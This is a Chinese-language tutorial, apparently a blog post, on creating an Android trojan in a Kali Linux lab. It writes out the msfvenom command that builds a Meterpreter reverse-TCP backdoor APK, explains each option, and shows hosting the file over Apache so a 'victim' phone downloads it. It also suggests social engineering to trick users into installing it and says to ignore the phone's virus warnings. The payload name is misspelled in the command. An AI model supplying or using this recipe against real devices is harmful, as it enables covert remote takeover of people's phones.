一、網絡配置
1、首先保證所有的設備(kali虛擬機和Android/ target=_blank class=infotextkey>安卓手機)都連接到同一個局域網(Wi-Fi)下。
在現實生活中,黑客通常找尋免費的公共Wi-Fi,來保證有足夠多的安卓手機供其滲透。所以如無必要,還是盡量不要使用公共Wi-Fi。
操作詳解:
Kali設置網絡環境(橋接模式)
然后再點擊 “確定”即可。
2、受害者安卓手機的網絡設置
將安卓手機連接到與kali虛擬機相通的局域網下,并查看其ip地址。
3、查看kali虛擬機的ip地址是否與安卓手機在同一局域網下(網段)
在kali終端輸入:ifconfig
4、生成安卓木馬
讓所有的安卓手機(與kali虛擬機在同一個局域網之中)。
在kali中生成一個安卓木馬(一個apk文件),在終端輸入命令:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 R>/root/shell.apk
用msfvenom生成一個安卓端的meterpreter的反向payload
–p (- -payload-options) 添加載荷payload。
載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的后門,所以只有選對payload,再填寫正確自己的IP,PORT就可以生成對應語言,對應平臺的后門了!
上面的命令是指定返回一個tcp的payload
lhost指定本定監聽的地址,即本地kali虛擬機的ip地址。
lport指定監聽本地的端口號(4444)
5、操作詳解:
用msfvenom生成一個安卓端的meterpreter的反向payload
由于我們只是滲透測試,并且攻擊環境并不非常理想化,有興趣的可以使用社會工程學來誘導用戶對該apk文件下載并安裝。接下來,就只開啟apach服務,讓安卓主機自動安裝該apk文件。
6、在安卓手機瀏覽器的地址欄輸入:192.168.0.102/shell.apk,kali虛擬機的IP地址/shell。apk。并將apk木馬文件下載下來。
即使提醒病毒風險,也沒有多大關系,繼續安裝成功就可以。